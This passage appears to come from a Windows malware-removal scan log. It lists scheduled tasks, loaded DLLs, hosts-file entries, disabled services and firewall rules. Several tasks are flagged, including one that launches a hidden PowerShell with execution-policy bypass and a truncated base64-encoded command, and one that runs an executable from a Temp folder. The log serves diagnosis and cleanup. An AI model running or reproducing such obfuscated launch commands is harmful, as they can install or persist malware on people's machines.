Task: {7648CD77-5E65-4D93-85AA-8ED7CDF43B69} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {7C2C3EC5-C44D-4D7D-BAD7-F1F110691DA2} - System32\Tasks\{93E542A6-D284-4FC7-8F38-4BD1224DB099} => Chrome.exe
Task: {883A4C4B-246A-4802-A430-C2F758594DE3} - System32\Tasks\{E76114B5-F5E0-4110-A9D4-4E4D1B9AC0E6} => Chrome.exe
Task: {8AE63F37-E3BB-487B-A3E9-89E4E1F3D437} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {8B7CBE50-1EFE-4DCC-A26C-A6526401CE28} - System32\Tasks\Test TimeTrigger => C:\Users\ADMINI~1\AppData\Local\Temp\Runner.exe <==== ATTENTION
Task: {8DA0916B-D6EF-41AC-848E-4E56BFEDC356} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {8E769F28-6811-46DC-8860-7F357DE0E54B} - System32\Tasks\{165E0EEE-053E-430B-BE7E-3A4C136D1416} => pcalua.exe -a "H:\Adobe Photoshop CS4 Extended Edition\Photoshop CS4 Install\payloads\AdobeAIR1.0\AdobeAIRInstaller.exe" -d "C:\Program Files (x86)\Common Files\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8" -c -silent
Task: {90110391-5111-4908-8357-59AB34EAC899} - System32\Tasks\{A7FE5530-718F-4B1D-91C1-3A81F217DBAB} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F9B37992-968C-4264-8449-489032FC28DE}\setup.exe" -c -runfromtemp -l0x0409
Task: {93BF64C1-401B-43B9-8B4A-83AD13FEEBD3} - System32\Tasks\{4E6158EF-F90B-4F5C-9F7C-10BC4CC4F602} => pcalua.exe -a C:\Users\pcw\Downloads\DAEMONToolsPro4360309-0160.exe -d C:\Users\pcw\Downloads
Task: {A0E8684E-1879-4B47-8795-9AD16D3C0DAA} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {A87ADFE8-F13C-4D45-B037-ED71675B81EE} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-03-15] (Microsoft Corporation)
Task: {ACD93D0B-9F74-4ECB-AA1D-465B68C2B374} - System32\Tasks\{C51C5F60-15B8-44A6-80FE-F94C1A28E364} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.1.0.104.280/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;notincluded,google-chrome&#058;notoffered;disabled
Task: {B0911F13-D386-4D8E-B46D-0E0E4FD1309B} - System32\Tasks\{DA8CF6A7-882A-4087-B739-D8ADAF57AD4C} => pcalua.exe -a E:\QuickInstall.exe -d E:\
Task: {B4C93BE6-062B-42EE-873F-2F36B8B7CA53} - System32\Tasks\{3B443DDB-226F-406A-8161-AAE960162048} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lig ... tError=404
Task: {B80AEAC9-2D84-4293-8EA5-73407A8471BB} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B8BF88B3-398C-4304-AA50-6C6D8ECFD01B} - System32\Tasks\{6FE33958-2979-4FC5-ABBC-7DCE16700255} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\Office Setup Controller\setup.exe" -c /uninstall HOMESTUDENTR /dll OSETUP.DLL
Task: {BBC78C39-A315-448C-B166-44C453FFC47D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe [2010-06-26] (Google Inc.)
Task: {C0457296-52EC-4EE4-8AD5-DB20CAF0F0FF} - System32\Tasks\{27B2263C-7E6F-441A-9C1B-2954741052B7} => pcalua.exe -a "C:\Users\Administrator\Documents\Vuze Downloads\STALKER Call Of Pripyat-Razor1911\rzr-stcp\Redist\NetFX\dotnetfx35.exe" -d "C:\Users\Administrator\Documents\Vuze Downloads\STALKER Call Of Pripyat-Razor1911\rzr-stcp\Redist\NetFX"
Task: {C06087C5-D73B-4ECB-9E1D-E5267F81C592} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {D62329D7-4821-4EA9-882E-0D72058F7A1F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EC632829-4F17-4438-996D-DB96D27DF7D2} - System32\Tasks\{777698A2-10AB-4C3D-9052-E5A7866A67DD} => pcalua.exe -a E:\QuickInstall.exe -d E:\
Task: {ED898442-2CFF-46BD-907B-F32299346882} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F0D5C121-195F-4001-9B8B-5650699451C7} - System32\Tasks\{04090E47-0E7A-0A09-0A11-7D7A0905110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9388 more characters). <==== ATTENTION
Task: {F34232F7-00D2-49E0-8A9A-236C34FC184E} - System32\Tasks\{B719C303-4747-455A-B3FE-1D627710A978} => pcalua.exe -a C:\Users\pcw\Desktop\milionar_lt.exe -d C:\Users\pcw\Desktop
Task: {F797E113-7D13-4DD0-9E5F-38D803ECEE8E} - System32\Tasks\Games\UpdateCheck_S-1-5-21-4246815794-1745546178-596238576-1000
Task: {F7C00807-871D-4C30-ADBA-81FA9AAC2923} - System32\Tasks\{CB50C5BC-2E0C-4BF8-A0BE-9B1908A49EBC} => Chrome.exe hxxp://ui.skype.com/ui/0/5.3.0.120.280/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;notincluded,google-chrome&#058;notoffered;ienotdefaultbrowser2
Task: {F89990A0-E2B2-449B-9189-935D0BFBEDBA} - \ConfigFree Startup Programs -> No File <==== ATTENTION
Task: {FF09C42A-84A7-46B6-9FE3-2E16B2699364} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_19_0_0_185_pepper.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core.job => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA.job => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\WINDOWS\System32\BsTrace.dll
2014-08-16 22:43 - 2015-10-13 05:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00009728 _____ () C:\Windows\system32\BsHelpCSps.dll
2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-18 05:10 - 2015-10-13 18:26 - 00125616 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-12 21:54 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 21:54 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2008-03-07 13:54 - 2008-03-07 13:54 - 17892352 _____ () C:\Windows\system32\BsLangInDepRes.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\Windows\system32\BsTrace.dll
2016-04-21 20:35 - 2016-04-21 20:35 - 00959176 _____ () C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-28 16:25 - 2015-09-01 17:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00044544 _____ () C:\Windows\system32\BlueSoleilCSps.dll
2015-12-18 23:43 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-12 21:52 - 2016-04-02 04:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-12 21:53 - 2016-04-02 04:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-12 21:53 - 2016-04-02 03:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-12 21:54 - 2016-04-02 03:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-12 21:54 - 2016-04-02 04:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-02-19 21:13 - 2016-02-19 21:13 - 00113496 _____ () C:\Program Files\Alwil Software\Avast5\log.dll
2016-02-19 21:13 - 2016-02-19 21:13 - 00133768 _____ () C:\Program Files\Alwil Software\Avast5\JsonRpcServer.dll
2016-04-21 20:31 - 2016-04-21 20:31 - 02890240 _____ () C:\Program Files\Alwil Software\Avast5\defs\16042103\algo.dll
2016-04-14 19:44 - 2016-04-14 19:44 - 00509344 _____ () C:\Program Files\Alwil Software\Avast5\ffl2.dll
2016-04-25 09:56 - 2016-04-25 09:56 - 02890240 _____ () C:\Program Files\Alwil Software\Avast5\defs\16042500\algo.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\WINDOWS\SYSTEM32\BsTrace.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00009728 _____ () C:\Windows\SYSTEM32\BsHelpCSps.dll
2009-09-02 09:43 - 2009-09-02 09:43 - 00114808 _____ () C:\Program Files (x86)\IVT Corporation\BlueSoleil\setup.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00044544 _____ () C:\Windows\SYSTEM32\BlueSoleilCSps.dll
2016-04-21 20:35 - 2016-04-21 20:35 - 00679624 _____ () C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll
2016-04-22 20:34 - 2016-04-20 22:08 - 01738904 _____ () C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.87\libglesv2.dll
2016-04-22 20:34 - 2016-04-20 22:08 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.87\libegl.dll
2016-04-15 20:10 - 2016-03-21 22:50 - 00034768 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00019408 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00116688 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2016-04-15 20:10 - 2016-03-21 22:50 - 00093640 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00018376 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\select.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00019760 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00105928 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32api.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00392144 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2016-04-15 20:10 - 2016-04-08 19:20 - 00381752 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00692688 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020816 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00112592 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 01682760 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021840 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00038696 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\fastpath.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00020936 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024528 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32event.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00114640 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32security.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00124880 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32file.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021832 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_x64d8f881xc8c369be.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024016 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00175560 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32gui.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00030160 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00043472 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32process.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00028616 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32ts.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00048592 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32service.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00026456 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00057808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024016 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32profile.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00117056 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00023376 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00134608 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00134088 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00240584 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00024392 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00036296 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\librsync.dll
2016-04-15 20:10 - 2016-04-08 19:19 - 00031568 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2016-04-15 20:10 - 2016-03-12 01:46 - 00293392 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2016-04-15 20:10 - 2016-04-08 19:19 - 00052024 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00020800 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021824 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.kernel32._winffi_kernel32.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00019776 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.winerror._winffi_winerror.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00020800 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.wininet._winffi_wininet.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020280 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00350152 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00022352 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00084280 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2016-04-15 20:10 - 2016-04-08 19:20 - 01826096 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00083912 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\sip.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 03928880 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 01971504 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00531248 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00132912 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00223544 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00207672 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00158008 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00042808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2016-04-15 20:10 - 2016-03-21 22:54 - 00017864 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\libEGL.dll
2016-04-15 20:10 - 2016-03-21 22:54 - 01631184 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2016-04-15 20:10 - 2016-04-08 19:20 - 00025928 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00024904 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00546096 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00357680 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2016-04-15 20:10 - 2016-03-21 22:56 - 00697304 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-04-25 19:47 - 2016-04-25 19:47 - 00385024 _____ () C:\Users\Administrator\AppData\Local\Temp\libsqlitejdbc-5116629933226350711.lib
2016-01-04 22:57 - 2016-01-04 22:57 - 40539648 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2016-03-15 21:27 - 2016-03-15 21:27 - 00325824 _____ () C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\AppVIsvStream32.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2008-03-07 13:54 - 2008-03-07 13:54 - 17892352 _____ () C:\WINDOWS\SYSTEM32\BsLangInDepRes.dll
2009-09-02 09:48 - 2009-09-02 09:48 - 00144384 _____ () C:\WINDOWS\SYSTEM32\BsProfilefunc.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-05-04 17:53 - 2016-02-29 01:58 - 00000986 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4246815794-1745546178-596238576-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{a7e077df-6f3d-48b4-b24a-3af8c7aae5cb}.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: BecHelperService => 2
MSCONFIG\Services: cfWiMAXService => 2
MSCONFIG\Services: ConfigFree Service => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: IAStorDataMgrSvc => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: TemproMonitoringService => 2
MSCONFIG\Services: Thpsrv => 2
MSCONFIG\Services: TMachInfo => 3
MSCONFIG\Services: TODDSrv => 2
MSCONFIG\Services: TosCoSrv => 2
MSCONFIG\Services: TOSHIBA eco Utility Service => 2
MSCONFIG\Services: TOSHIBA HDD SSD Alert Service => 3
MSCONFIG\Services: TPCHSrv => 3
MSCONFIG\Services: UNS => 2
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
HKLM\...\StartupApproved\Run: => "Toshiba Registration"
HKLM\...\StartupApproved\Run32: => "BtTray"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\StartupApproved\Run: => "Remote Mouse"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{8372EF70-543D-4ED8-804C-7842D48704C8}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{454FCEF1-0D59-4900-B70C-FBF66565C053}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{6DFFF19A-5205-4C4F-A43D-55D7D1A2AF3F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{1023B708-3C83-4931-B92E-F7792C471AAF}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{C87D982E-2DCF-4176-BD52-7685F80AD7E1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [UDP Query User{FE50F189-D1E1-4D1A-9E14-0F54AB07D195}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe
FirewallRules: [TCP Query User{19EC8BDD-8F7C-43C5-8367-B7A6DA4CAD42}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe
FirewallRules: [UDP Query User{496EB30E-54D8-4633-8931-69D6D0FACCEA}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [TCP Query User{BD8F755D-450E-422E-A85F-0D0F6A06E30D}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{A297315D-B247-46E2-B2C2-6F3963BCF3C6}] => (Allow) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
FirewallRules: [{1BF48D9F-DF5E-4387-A2CD-CB80874D0527}] => (Allow) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
FirewallRules: [{979106D8-5B94-4C84-B362-3239DAC28BEF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{635C3F99-C974-4430-9CFA-1B29FAD126F8}C:\program files (x86)\vuze\azureus.exe] => (Allow) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [UDP Query User{F60A2823-1848-4D05-96D1-F0B162038C6A}C:\program files (x86)\vuze\azureus.exe] => (Allow) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [{156A9C93-1C7C-4546-9700-A73955BE54BE}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{891F6A02-CC56-4F89-AED6-B96FB41271BB}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
